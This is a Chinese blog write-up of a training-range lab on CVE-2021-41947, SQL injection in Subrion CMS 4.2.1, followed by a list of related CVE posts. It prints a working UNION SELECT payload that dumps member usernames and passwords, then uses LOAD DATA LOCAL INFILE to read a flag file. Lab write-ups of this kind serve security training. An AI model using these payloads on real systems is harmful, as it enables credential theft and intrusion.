春秋云镜 CVE-2021-41947

最新推荐文章于 2025-05-16 15:20:27 发布
最新推荐文章于 2025-05-16 15:20:27 发布
阅读量921 收藏 2
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_22002773/article/details/132201440
版权
博客围绕春秋云镜CVE - 2021 - 41947,指出Subrion CMS v4.2.1存在SQL注入漏洞。介绍了靶标,阐述启动场景后进行漏洞利用,给出登录后台的链接及相关操作,如创建表、加载文件等,最终获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2021-41947 Subrion CMS v4.2.1 存在sql注入

靶标介绍

Subrion CMS v4.2.1 存在sql注入。

启动场景

在这里插入图片描述

漏洞利用

exp

http://localhost/panel/visual-mode.json?get=access&type=blocks' UNION ALL SELECT username, password FROM sbr421_members -- -&object=landing_what_is_this&page=index

admin/admin 登录后台
在这里插入图片描述
http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr415_members%20–%20-&object=landing_what_is_this&page=index
在这里插入图片描述
进入管理仪表盘http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/database/
在这里插入图片描述

CREATE TABLE xxx(data TEXT);
load data local infile ‘/flag’ into table xxx;
select * from xxx;

在这里插入图片描述
得到flag

flag{9ff99874-e577-4746-a77b-1b3020a20242}

安全漏洞】CVE-2021-41773和CVE-2021-42013漏洞分析
HBohan的博客
10-16 2301
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1737
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Subrion CMS存在SQL注入(CVE-2021-41947)
weixin_68999845的博客
07-21 1527
get=access&type=blocks后,是否紧跟恶意sql注入payload,若存在,则观察响应体result部分是否回显出敏感信息,若出现,则攻击成功。Subrion CMS v4.2.1版本在可视模式下存在SQL注入漏洞。(type、object和page参数后的value可为任意值type后的值跟单引号闭合),即可得到敏感信息。字符型注入,参数type用单引号标识,代码未对敏感关键字进行判断,只需单引号闭合即可绕过,从而获取敏感信息。type字段后的值跟单引号闭合,后用“-- -”闭合。
春秋靶机
niqiu320的博客
04-10 2299
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
CVE-2021-40449 分析
qq_41252520的博客
03-24 2025
前言 该漏洞本身原理比较简单,而作为 Win10下的利用才是本篇文章的研究重点。 1.漏洞简介 1.1.漏洞描述 win32kfull.sys中的 NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}NtGdiResetDC函数存在 UAF漏洞,攻击者可以利用该漏洞进行本地权限提升。 1.2.影响版本 windows_10 windows_10 20h2 windows_10 21h1 windows_10 1607 windows_10 1809 w
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 413
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
春秋 CVE-2021-41773
yh
12-05 402
春秋 CVE-2021-41773
春秋 CVE-2021-21315
qq_22002773的博客
08-16 565
春秋 CVE-2021-21315
春秋 CVE-2021-40282
qq_22002773的博客
07-29 504
CVE-2021-40282
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1358
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2692
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 762
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Vulnhub_Venom
weixin_44193247的博客
02-21 869
Vulnhub_Venom
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 294
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 222
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 533
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
中大型水闸安全监测系统解决方案
最新发布
weixin_48039531的博客
05-16 426
然而,由于历史原因,许多水闸存在建设标准偏低、质量较差、配套设施不完善等问题,加之受“重建轻管”思想影响,多数水闸建成后缺乏有效的管理和维修养护,存在较多的安全隐患,安全运行风险突出。现代化的水闸安全监测系统不仅能够实现实时监测、数据分析、预警报警等功能,还能够通过三维可视化技术,实现水闸运行状态、水流情况、水位变化等数据的直观展示,为管理决策提供更加科学、准确的依据。通过实时监控水闸的结构状态、水文数据和环境变化,可以及时发现潜在的风险和问题,从而采取相应的预防措施,确保水闸的稳定性和耐久性。
春秋CVE-2018-18086
01-23
### 关于春秋 CVE-2018-18086 漏洞详情 对于CVE-2018-18086漏洞,此安全问题存在于Python的PyPI仓库中,在处理特定类型的HTTP请求时存在缺陷。具体来说,当服务器接收到带有特制User-Agent头的HTTP请求时,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值